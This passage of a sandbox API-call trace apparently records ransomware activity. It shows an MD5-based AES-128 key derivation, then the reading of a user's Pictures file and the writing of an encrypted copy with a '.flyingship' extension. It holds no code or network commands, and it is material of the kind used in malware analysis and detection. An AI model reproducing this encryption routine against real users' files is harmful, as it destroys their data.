Flags=0x0, Size=0x10) returned 0x9bd960 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.704] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.705] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0191.706] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.706] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.706] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.706] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.706] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.717] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.717] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.717] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.717] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.718] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.718] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.718] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.718] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.718] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.718] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.719] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.719] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.719] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.719] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.719] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.720] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.720] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.720] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0191.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.721] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0191.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.721] CryptDestroyHash (hHash=0x90ae18) returned 1 [0191.721] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xslu.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.722] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.723] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0191.723] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xslu.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0191.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.725] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.725] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x7498, lpOverlapped=0x0) returned 1 [0191.727] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.728] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.728] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.728] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.728] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.729] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.729] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.729] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.729] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.729] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.729] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: 